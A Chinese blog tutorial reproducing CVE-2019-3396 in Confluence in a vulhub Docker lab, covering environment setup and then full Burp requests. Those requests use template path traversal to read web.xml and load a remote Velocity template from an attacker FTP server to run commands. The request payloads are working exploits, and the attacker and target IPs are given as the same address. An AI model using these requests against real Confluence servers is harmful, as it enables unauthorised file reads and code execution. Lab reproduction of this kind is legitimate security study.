完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞（CVE-2019-3396）

本文主要是介绍完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞（CVE-2019-3396），希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

搭建环境之前，最好将虚拟机的内存调至4G

靶机ip：192.168.187.130，os：centos7

攻击主机：ip：192.168.187.130， os：kali2019，工具：burpsuite

（一）安装pip，docker环境

由于docker-compose需要pip来安装，首先要安装pip环境

1.安装docker

用root账户登陆linux，我这里用的centos7，其他的linux系统也可以

然后执行

curl -s https://get.docker.com/ | sh

然后执行docker -v查看docker是否安装成功

2.安装pip

curl -s https://bootstrap.pypa.io/get-pip.py|python

可以看到成功安装了两个工具，这里再检查一下有没有安装setuptools工具

执行pip install setuptools

检查pip版本pip -V

3. pip安装docker-compose

这里可能会遇到很多报错，参考https://www.cnblogs.com/felixqiang/p/11946644.html解决

当出现这个时，意味着docker-compose成功安装

docker-compose -v查看版本号

4.克隆vulhub的github库

yum install git，首先安装git

git clone https://github.com/vulhub/vulhub，克隆vulhub库，可以下载可能会比较慢

到这里结束建议保存快照，每次做完一个漏洞复现就可以恢复快照从而恢复环境

或者输入docker-compose down移除环境

（二)启动环境

1.启动docker环境

cd vulhub/confluence/CVE-2019-3396/，进入CVE-2019-3396目录

systemctl start docker，启动docker

systemctl status docker，检查docker是否在运行

docker-compose build && docker-compose up -d，启动漏洞环境

这里搭建时间会很久，可以搞一个加速器

sudo vi /etc/docker/daemon.json

请在该配置文件中加入（没有该文件的话，请先建一个）：

{"registry-mirrors": ["http://hub-mirror.c.163.com"]
}

出现这个说明启动成功了

再看一下8090端口是否启动

2.启动Confluence环境

在当前linux系统访问http://localhost:8090/，选择Trial Installation

这里会要求填写license key，先不要着急，点击Get an evaluation license，获取一个临时证书

之后他会让你注册一个账户，按要求注册即可，不需要个人信息，也不需要花钱，注册好后登陆

会来的申请证书的界面，按图示操作即可（不要选择Data Center和Addons）

然后进入License，选择一个证书

复制License Key

粘贴到之前这个页面的Confluence框，如果找不到这个页面就在地址栏输入localhost:8090

然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长（建议使用4G内存以上的机器进行安装与测试），请耐心等待。这里千万不要中断。

如果提示填写cluster node，路径填写/home/confluence即可。

后续可能要求你填写数据库账号密码，选择postgres数据库，地址为db，账号密码均为postgres：

至此靶机环境已经搭建完成

（四）漏洞复现

Atlassian Confluence是企业广泛使用的wiki系统，其6.14.2版本前存在一处未授权的目录穿越漏洞，通过该漏洞，攻击者可以读取任意文件，或利用Velocity模板注入执行任意命令。

我在kali上打开burpsuite，选择Repeater，输入如下文本，把localhost替换成靶机的ip地址，如果攻击主机和靶机是同一台机器则不用

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

点击GO执行，拿到账户文件

抓取web.xml，将localhost替换为靶机ip，如果攻击主机和靶机是同一台机器则不用，burpsuite输入如下文本

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 172{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

拿到web.xml

6.12以前的Confluence没有限制文件读取的协议和路径，我们可以使用file:///etc/passwd来读取文件，也可以通过https://...来加载远程文件（在攻击主机上完成该步骤）

git clone https://github.com/Yt1g3r/CVE-2019-3396_EXP.git //先下载EXP

然后用python搭建一个临时的ftp服务器

pip install pyftpdlib

cd CVE-2019-3396_EXP //进入这个目录

python -m pyftpdlib -p 21 //启动FTP服务

将localhost替换为靶机ip，ip:port替换为攻击主机ip和21端口如果攻击主机和靶机是同一台机器则不用，在burpsuite输入如下文本

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 198{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://ip:port/cmd.vm","cmd":"id"}}}

拿到uid